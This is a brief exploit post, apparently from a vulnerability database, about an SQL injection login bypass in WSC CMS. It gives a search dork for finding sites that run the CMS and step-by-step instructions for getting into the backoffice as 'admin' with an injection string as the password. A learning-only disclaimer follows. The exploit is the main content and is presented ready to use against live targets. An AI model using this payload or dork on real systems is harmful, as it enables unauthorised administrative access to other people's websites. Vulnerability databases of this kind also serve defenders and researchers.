------------------------------------------------------ ------------------------------------------------------ _____ _ | __ \| | | |__) | |__ ___ _ __ ___ _ __ ___ | ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \ | | | | | | __/ | | | (_) | | | | | | |_| |_| |_|\___|_| |_|\/__/|_| |_| |_| ------------------------------------------------------ ------------------------------------------------------ ############### WSC CMS (Bypass) SQL Injection Vulnerability ################################### # # Author : Phenom # # mail : sys.phenom.sys[at]gmail[dot]com # # Dork : Realizzato con WSC CMS by Dynamicsoft # ################################################################################################ ####### Exploit ################################################################################ # # 1- http://server/public/backoffice # # 2- login with "admin" as user name and 'or' as password # ################################################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论